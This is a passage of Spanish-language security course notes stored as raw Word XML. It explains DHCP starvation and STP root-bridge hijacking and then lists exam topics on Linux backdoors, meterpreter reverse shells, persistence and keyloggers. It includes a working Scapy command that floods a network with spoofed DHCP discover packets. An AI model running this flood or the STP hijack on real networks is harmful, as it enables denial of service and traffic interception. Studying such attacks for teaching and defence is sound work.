    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Como vemos existen paquetes DHCP con distintos marcajes: el Discover, el Offer, el Request y el ACK todos ellos componen lo que sería la petición y asignación de una IP dinámica.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahora es el momento de buscar algun script o tutorial de como forjar un paquete o paquetes que realizan esta acción. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="800000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scapy</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Welcome to Scapy (v1.1.1 / -)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">&gt;&gt;&gt; conf.checkIPaddr = False</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">&gt;&gt;&gt; dhcp_discover =  Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">&gt;&gt;&gt; sendp(dhcp_discover,loop=1)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">...............................................................^C</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Sent 70 packets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="787400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="18" name="image49.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image49.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="787400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Como vemos en la imagen del Wireshark para cada DHCP/request se genera un mensaje válido de transacción por lo tanto el servicio DHCP a aceptado la petición y solo quedaría entregar una IP disponible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tambien se deberia buscar en la comunicaciones del Wireshark un paquete de tipo Response o offer en que nos otorga una IP disponible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STP Mangler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">En el ejercicio anterior hemos utilizado un protocolo de la capa de aplicación para construir un mensaje DHCP, por lo tanto vemos que es posible encapsular paqueteria asociada a servicios de red. Pero hay que saber que existen protocolos que van asociados a dispositivos de red y otro hardware que puede aportar valor añadido a la red. En este apartado estudiaremos un protocolo asociado a los switches por lo tanto tiene que ver con la infraestructura de red en concreto el protocolo STP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STP es un protocolo de gestión de dispositivos de capa 2 (switches o switches inteligentes) la función básica de STP es la de identificar dispositivos del mismo tipo en la red y prevenir bucles de conexión como el siguiente ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3986213" cy="2038350"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13" name="image44.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image44.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3986213" cy="2038350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El funcionamiento de este protocolo a grandes rasgos sería el siguiente: Cuando un switch se conecta a la red envía BPDU (Bridge Protocol Data Unit) enviando información sobre el switch en ese momento los otros switches también envían sus BPDU por lo tanto todos los switches del broadcast quedan identificados y como conocen sus vecinos se puede crear una topología virtual, después de que se han realizado las comunicaciones STP uno de los switches toma el rol de “root” ya que su prioridad es más alta. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Si el root determina que hay un bucle entre los switches tomará la decisión de cortar uno de los enlaces. De esa forma se corrige el problema de la redundancia entre las tablas MAC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4719638" cy="3143250"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="12" name="image39.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image39.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4719638" cy="3143250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000132">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El ataque STP consiste en que un hacker se conecta físicamente a un enlace entre switches quedando un infraestructura como en la imagen superior. El hacker en este momento ya está preparado para forjar paqueteria de tipo BPDU e identificarse a la red como un switch también se asigna un valor de priority alto para asumir el rol de “root”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000135">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cuando se otorga como “root” podrá tomar la decisión de cortar un enlace legítimo en ese momento todas las comunicaciones que había entre los switches se enviaran al hacker y este podrá reenviarlas al otro extremo. Este ataque permitirá que el hacker controle y supervise el tráfico de la empresa y que sea totalmente transparente para los usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000137">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Entra Examen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013F">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000140">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backdoor de linux,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="red"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Diagrama</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Funcionamiento</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000141">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000142">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backdoor de linux, explicación de:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Como crear el ejecutable con carga.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explicar reverse_TCP y meterpreter ( exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000146">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Creación del script de escucha que tiene el hacker con el metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cómo perpetuar el ataque en el cliente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Que es un keylogger y como perpetuarlo con este ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
